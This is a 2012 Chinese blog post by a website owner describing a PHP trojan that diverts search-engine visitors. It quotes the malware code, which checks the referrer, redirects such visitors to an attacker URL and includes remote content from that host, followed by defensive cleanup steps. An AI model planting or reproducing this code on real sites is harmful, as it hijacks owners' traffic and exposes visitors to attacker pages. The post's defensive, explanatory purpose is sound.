关于导致搜索引擎来路流量转移的php木马介绍及防范

2012 年 10 月 8 日8430

如果你的网站平时流量很大,PV很高,某一天PV却开始变少,除开反思网站内容,还要考虑下网站是否中木马,其实很早以前便有导致搜索引擎流量转移php木马,简单来说便是如果访问流量来自搜索引擎,那么自动获得对方网站的文件,从而让你的网站不被用户看到。

因为我的网站近期遭受到这样的攻击,所以正好分享下这段代码,希望对于广大站长有所启示,特别是对于用php程序建站的站长,还是应该范下这类攻击。按照历史的情况来看,这样的木马不少见,似乎一年前甚至几年前便有,只是可能现在取得的效果没过去那么好。

下面是导致搜索引擎来路流量转移的攻击代码:

error_reporting(E_ERROR);

header('content-Type: text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$REFerer = Split("#",$come_from) ;

foreach($referer as $v){

if(stristr($_SERVER['HTTP_REFERER'],$v))

{

Header("Location:".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

}

echo file_get_contents('http://www.abc.com//xx/dn2.php');

?>

代码很简单,如果访问来源是搜索引擎,那么会定位到下面所述的php文件及html文件,这样用户便没法获得预想的东西。当然,现在每个服务器的按照设置不一样,部分服务器即便是被上传此类文件,还是限制执行的;不过,既然遇到问题,那么接下来便是要解决问题。

下面简单说说我的处理方法,希望对大家以后遇到类似的情况有所帮助。

第一步自然是删除类似的php的文件,这类php文件没有固定的名字,不过都是在根目录,所以查找起来很方便,删除掉那些陌生的文件即可。删除以后不要激动,先去别的目录查找下类似的陌生文件,看到陌生的文件后打开看看,有问题直接删除。

第二步是继续去看常用的系统php文件,看看这些文件是否近期被修改过,如果被修改过,那么下载下来,随后查找前面出现的陌生php文件名,好比原来是出现的dv.php,现在可以搜索下dv.php,看看会不会被修改成这样;另外便是,一般别的目录下还会有真正的木马。

第三步可以去360网站安全检测平台看看,上传文件验证通过即可开始测试网站是否安全;一般而言,如果网站被挂黑链或者有不可见的文字,都会有提示,所以还是比较好用的。特别是对于黑链检测,这点功能比较好,因为黑链一般都是隐藏的,站长自己很难想到的。

第四步是修改弱口令,不管是FTP账号密码,还是网站后台地址,还是网站后台登录名,还是别的什么密码,如果觉得太弱了,好比只有七八位,那么建议修改得更难一点,不少网站被破解,都是弱口令被扫描到,加大密码长度对于这类破解网站的范还是有帮助的。

写到这里,这个故事基本上告一段落了,网站安全刻不容缓,每时每刻我们都应该注意网站的安全问题,你不注意,那些挂黑链的人可会惦记上你的,只有不断提升网站的安全才可以尽量避免被黑。本文由爱不网(http://www.aibue.com)站长原创,转载分享请注明,谢谢合作!

(aibue.com)

0 0